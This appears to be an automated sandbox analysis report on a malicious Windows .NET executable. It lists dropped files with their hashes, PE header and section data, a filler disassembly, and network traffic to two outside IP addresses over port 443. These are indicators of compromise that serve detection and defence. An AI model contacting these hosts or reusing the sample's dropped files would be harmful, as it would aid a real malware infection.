                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\Desktop\UBONg7lmVR.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):8077824
                                                Entropy (8bit):6.958055025032026
                                                Encrypted:false
                                                SSDEEP:98304:ha48jDV5s44tAbCEAVomRGM6oCRXpqALGFFV/lz8RY5ui2R:haV5s4ZPAunVRZXGxlz8cuF
                                                MD5:A499C507987982C951093E21DF0C0D96
                                                SHA1:FA1A7050198570E016FC4BF3DDD69160E05A8A38
                                                SHA-256:64AAFFE3B4D705B9DDBCE60E8FD8B9829C20438B8C68AE254E185C0F466E0265
                                                SHA-512:0AB3D225FC8901D9CC1719EE61E0CDB444532F8A43B307382E7F3E5D610BCF1D54B5ABEF23649C370E5E960366270D99D94629E47868AE7959522A54D574A27D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 11%
                                                • Antivirus: Virustotal, Detection: 8%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........u......."......~&...................@...........................................`... .............................................. ~.T.............Z.X............0~.......................................................N..............................text...5|&......~&................. ..`.rdata...h'...&..j'...&.............@..@.data.........N.......M.............@....pdata..X.....Z.......Q.............@..@.xdata........[.......R.............@..@/4......).....[.......R.............@..B/19....._.....[.......R.............@..B/32......l....b..n...tY.............@..B/46.....0.....d.......Z.............@..B/65......... d.......Z.............@..B/78.....:.....r.......i.............@..B/90...........{......6r.............@..B.idata..T.... ~.......t.............@....reloc.......0~.......t.............@..B.symtab.......~.......u................B........
                                                Process:C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):19
                                                Entropy (8bit):3.366091329119193
                                                Encrypted:false
                                                SSDEEP:3:hMCE/N:hul
                                                MD5:F92A9EF0567DB794EFBE6CC7D98974CC
                                                SHA1:51728A8A25C4F2805984F294DADCE85E738B90D9
                                                SHA-256:26D96E97CEE88C873CFA14F364E79DAE57265CF8DA97ED1EA65A66A5EC6AD673
                                                SHA-512:14C3C14D4E4D93619C0982BB22BD73930531F510C281BE2E8B1EC6C92F1E1CDCE11AC90F13D8F1F6EE79AAA88711B54AD119A16EE51582A2C6ED4071A5C9684A
                                                Malicious:false
                                                Preview:This is a new file.
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):0.025120815978877453
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:UBONg7lmVR.exe
                                                File size:52'506'624 bytes
                                                MD5:d2db9a159617250a517f9d074ab8f947
                                                SHA1:cdc8efcd77ce4725200f29b9be43dac308a139a1
                                                SHA256:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e
                                                SHA512:f1fba436f68603ce07314292bb63af326ddf4748d0b622b1da5d76c8880ae7c11c80301b339a847c41adb6d83eb95fb7f60b19385f2dcbd4c611d29017998376
                                                SSDEEP:1536:4no014QhBgKrsMGr5G+slCbUuz2KLj3tC7wjsX/jVh5X6XL5X7r0eHoz:4o014QhBgdACFleksXD5K7ln0hz
                                                TLSH:03B72B24D518FD3ADD1282344439E2EE262E1E40A671CC3EBD587E2E5DB33D43761EA6
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~4..........."...0...!.........n0!.. ...@!...@.. ........................!...........`................................
                                                Icon Hash:2d2e3797b72b0b99
                                                Entrypoint:0x361306e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xBB347EF2 [Thu Jul 11 14:49:22 2069 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x32130200x4b.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x32140000x19ea.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x32160000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x32110740x32112005a666a826e8dc7814dac7f8ff900a201unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x32140000x19ea0x1a0069965859e0a13ab7b1284d0e357f31f9False0.3487079326923077data4.665608381406232IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x32160000xc0x200e92f29fd0f22a9375098f27ff47f755dFalse0.044921875MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "!\003\014"0.11836963125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x32141c00x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.5675675675675675
                                                RT_ICON0x32142e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 3200.476878612716763
                                                RT_ICON0x32148500x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.46774193548387094
                                                RT_ICON0x3214b380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 11520.40794223826714804
                                                RT_GROUP_ICON0x32153e00x3edata0.8387096774193549
                                                RT_VERSION0x32154200x3e0data0.35786290322580644
                                                RT_MANIFEST0x32158000x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                DLLImport
                                                mscoree.dll_CorExeMain
                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 27, 2024 12:55:12.265698910 CEST49704443192.168.2.5185.166.143.48
                                                Aug 27, 2024 12:55:12.265747070 CEST44349704185.166.143.48192.168.2.5
                                                Aug 27, 2024 12:55:12.265824080 CEST49704443192.168.2.5185.166.143.48
                                                Aug 27, 2024 12:55:12.282603025 CEST49704443192.168.2.5185.166.143.48
                                                Aug 27, 2024 12:55:12.282623053 CEST44349704185.166.143.48192.168.2.5
                                                Aug 27, 2024 12:55:13.032980919 CEST44349704185.166.143.48192.168.2.5
                                                Aug 27, 2024 12:55:13.033111095 CEST49704443192.168.2.5185.166.143.48
                                                Aug 27, 2024 12:55:13.038288116 CEST49704443192.168.2.5185.166.143.48
                                                Aug 27, 2024 12:55:13.038306952 CEST44349704185.166.143.48192.168.2.5
                                                Aug 27, 2024 12:55:13.038563967 CEST44349704185.166.143.48192.168.2.5
                                                Aug 27, 2024 12:55:13.081181049 CEST49704443192.168.2.5185.166.143.48
                                                Aug 27, 2024 12:55:13.124507904 CEST44349704185.166.143.48192.168.2.5
                                                Aug 27, 2024 12:55:13.516140938 CEST44349704185.166.143.48192.168.2.5
                                                Aug 27, 2024 12:55:13.516165018 CEST44349704185.166.143.48192.168.2.5
                                                Aug 27, 2024 12:55:13.516211987 CEST49704443192.168.2.5185.166.143.48
                                                Aug 27, 2024 12:55:13.516223907 CEST44349704185.166.143.48192.168.2.5
                                                Aug 27, 2024 12:55:13.516254902 CEST49704443192.168.2.5185.166.143.48
                                                Aug 27, 2024 12:55:13.516279936 CEST49704443192.168.2.5185.166.143.48
                                                Aug 27, 2024 12:55:13.577198029 CEST49704443192.168.2.5185.166.143.48
                                                Aug 27, 2024 12:55:13.639477015 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:13.639509916 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:13.639601946 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:13.643021107 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:13.643033981 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.211185932 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.211258888 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.214601994 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.214612007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.214855909 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.216427088 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.260498047 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.357194901 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.358973980 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.359015942 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.359071016 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.359086990 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.359105110 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.359138012 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.446667910 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.446691036 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.446732044 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.446774006 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.446793079 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.446822882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.448649883 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.448683977 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.448728085 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.448734999 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.448774099 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.490104914 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.490114927 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.533317089 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.533334970 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.533412933 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.533421993 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.534727097 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.534749985 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.534782887 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.534792900 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.534818888 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.535761118 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.535790920 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.535820961 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.535828114 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.535851955 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.537529945 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.537554979 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.537580013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.537589073 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.537595987 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.537622929 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.537647009 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.625304937 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.625325918 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.625380993 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.625394106 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.625413895 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.625475883 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.625775099 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.625801086 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.625835896 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.625842094 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.625869036 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.626514912 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.626547098 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.626574993 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.626581907 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.626601934 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.627512932 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.627538919 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.627567053 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.627568007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.627578974 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.627599955 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.627629042 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.628309965 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.628324032 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.628375053 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.628382921 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.628415108 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.628438950 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.628444910 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.630225897 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.630248070 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.630281925 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.630289078 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.630312920 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.631207943 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.631222010 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.631273985 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.631283045 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.677484035 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.713562965 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.713584900 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.713675976 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.713687897 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.713731050 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.714184046 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.714524031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.714557886 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.714589119 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.714597940 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.714624882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.715332031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.715357065 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.715387106 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.715395927 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.715415955 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.716123104 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.716162920 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.716182947 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.716191053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.716217041 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.716731071 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.716758013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.716785908 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.716789007 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.716797113 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.716815948 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.716837883 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.718368053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.718384027 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.718427896 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.718441963 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.718451023 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.718461037 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.718473911 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.718489885 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.718518972 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.718523979 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.718556881 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.771307945 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.771322012 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.803248882 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.803272009 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.803339958 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.803365946 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.803651094 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.803674936 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.803704977 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.803718090 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.803741932 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.804342031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.804356098 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.804403067 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.804413080 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.804425955 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.804790020 CEST4434970752.216.214.209192.168.2.5
